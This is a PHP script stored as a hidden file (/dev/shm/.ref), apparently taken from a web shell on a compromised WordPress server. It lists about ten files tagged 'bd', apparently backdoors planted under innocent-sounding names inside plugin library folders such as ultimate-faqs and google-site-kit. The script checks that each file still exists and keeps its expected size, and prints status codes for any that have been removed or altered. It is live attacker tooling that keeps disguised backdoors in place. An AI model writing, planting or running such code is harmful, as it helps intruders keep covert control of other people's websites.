| Current Path : /dev/shm/ |
| Current File : //dev/shm/.ref |
<?php $r = '/home/lethal10/public_html'; $x = ["/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Engine/CYEC07_3winners.php"=>"bd@@2827@@1047",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Engineering/class.pager.php"=>"bd@@2323@@914",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/ele_text.php"=>"bd@@3400@@943",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Financial/Securities/QuoteLatex.php"=>"bd@@2141@@962",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Financial/CashFlow/Variable/webdb_view.php"=>"bd@@2914@@927",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Database/ErrorStruct.php"=>"bd@@2669@@916",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xls/FixNesting.php"=>"bd@@3214@@926",
"/wp-content/plugins/ultimate-faqs/lib/FPDF/doc/portuguese.php"=>"bd@@1427@@1044",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Calculation/Statistical/Averages/config.inc.php"=>"bd@@2009@@1023",
"/wp-content/plugins/ultimate-faqs/lib/PHPSpreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Shared/JAMA/utils/fix_priorities.php"=>"bd@@3066@@958"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');